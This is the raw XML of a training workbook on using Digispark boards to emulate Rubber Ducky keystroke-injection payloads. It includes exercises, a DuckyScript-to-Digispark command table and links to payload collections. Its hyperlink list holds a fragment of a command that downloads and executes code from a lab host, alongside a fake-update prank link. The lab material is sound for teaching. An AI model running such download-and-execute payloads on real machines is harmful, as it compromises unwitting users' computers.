        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>random(1000,5000)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t xml:space="preserve">4) Re-upload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>the sketch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t xml:space="preserve">Is the random </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>delay the same for each time, or different</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>What about when the device is re-plugged in?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="__RefHeading___Toc1126_152967944"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
        <w:t>Exercise 6 – Convert a Ducky Script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="__RefHeading___Toc1128_152967944"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
        <w:t>Aim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>The aim of this exercise is to duplicate 1 or more rubber ducky payloads. This may save you time in a practial environment, or provide you with insight as to we something isn’t working.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="__RefHeading___Toc1130_152967944"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
        <w:t>Method</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>Using appendix 1, find a Rubber ducky payload you want to emulate. Please bear in mind, the rubber ducky may have extra features (such as storage), that can’t be replicated without a USB flash drive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>Once you have your payload, using appendix 2, translate the payload for the digispark. Appendix 3, the list of special keys, may also be required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="__RefHeading___Toc193_2153683434"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
        <w:t>Appendix 1 - Useful Links</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>Arduino Language Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId14">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="SourceText"/>
          </w:rPr>
          <w:t>https://www.arduino.cc/en/Reference/HomePage</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>The Hidiot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId15">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="SourceText"/>
          </w:rPr>
          <w:t>https://docs.hidiot.com/cutting_code/using_the_arduino_ide/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>Rubber Ducky Payloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId16">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="SourceText"/>
          </w:rPr>
          <w:t>https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="__RefHeading___Toc195_2153683434"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
        <w:t>Appendix 2 - DuckyScript To Digispark Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>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Liberation Serif" w:hAnsi="Liberation Serif"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Ducky Script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Liberation Serif" w:hAnsi="Liberation Serif"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Digispark Equivalent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Liberation Serif" w:hAnsi="Liberation Serif"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Function</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REM</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 xml:space="preserve">// </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Or /* */</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Comments</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string</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print</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>()</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> or println</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>()</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">  </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 xml:space="preserve">Write a line of text, </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>or a line with a carriage return.</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GUI or WINDOWS</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 xml:space="preserve">sendKeyStroke(MOD_GUI_LEFT) </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">or </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>sendKeyStroke(MOD_GUI_</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>RIGHT</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w: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 xml:space="preserve">Sends a single key press of the </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b w:val="false"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DELAY</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delay()</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Wait</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bookmarkStart w:id="34" w:name="__RefHeading___Toc1132_152967944"/>
            <w:bookmarkEnd w:id="34"/>
            <w:r>
              <w:rPr/>
              <w:t>DEFAULT_DELAY or DEFAULTDELAY</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
                <w:b w:val="false"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>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N/A</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Sets the default delay between commands.</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MENU or APP or SHIFT F10</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sendKeyStroke(</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>KEY_F10,</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>MOD_</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>ALT</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>_LEFT)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rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Emulates the App key, sometimes referred to as the menu key or context menu key. On Windows systems this is similar to the SHIFT F10 key combo, producing the menu similar to a right-click.</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SHIFT</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MOD</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>_SHIFT_</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>LEFT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Shift Key</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ALT</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MOD</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>_ALT_LEFT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Alt Key</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CONTROL or CTRL</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MOD_CONTROL_LEFT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Control key</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REPEAT</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While() { }</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Repeat Command</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SPACE</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KEY_SPACE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The final frontier</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LEFTARROW or LEFT</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KEY_ARROW_LEFT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Left Arrow. NB, the other Arrow keys are not defined.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>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bidi w:val="0"/>
      <w:spacing w:before="200" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
      <w:b/>
      <w:bCs w:val="false"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="TextBody"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:bidi w:val="0"/>
      <w:spacing w:before="140" w:after="120"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
      <w:b/>
      <w:bCs w:val="false"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>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ContentsHeading">
    <w:name w:val="TOA Heading"/>
    <w:basedOn w:val="Heading"/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:ind w:left="0" w:right="0" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>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355" w:leader="dot"/>
      </w:tabs>
      <w:ind w:left="283" w:right="0" w:hanging="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Contents3">
    <w:name w:val="TOC 3"/>
    <w:basedOn w:val="Index"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="709"/>
        <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
      </w:tabs>
      <w:ind w:left="566" w:right="0" w:hanging="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Code">
    <w:name w:val="Code"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:shd w:fill="A9A9A9" w:val="clear"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="709"/>
      </w:tabs>
      <w:bidi w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mon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gistump.com/wiki/digispark/tutorials/connecting" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.arduino.cc/en/Main/Software" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=MmDBvgrYGZs" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/digistump/DigistumpArduino/releases/download/1.6.7/Digistump.Drivers.zip" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.gif"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpeg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.gif"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.gif"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://digistump.com/wiki/digispark/tutorials/linuxtroubleshooting" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://fakeupdate.net/windows98/index.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.56.1:8080/At9LLfkW&apos;);exec(r.read" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.arduino.cc/en/Reference/HomePage" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.hidiot.com/cutting_code/using_the_arduino_ide/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads"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LibreOffice/6.1.5.2$Linux_X86_64 LibreOffice_project/10$Build-2</Application>
  <Pages>14</Pages>
  <Words>1587</Words>
  <CharactersWithSpaces>10152</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2017-09-17T13:20:02Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-GB</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-08T12:44:58Z</dcterms:modified>
  <cp:revision>20</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>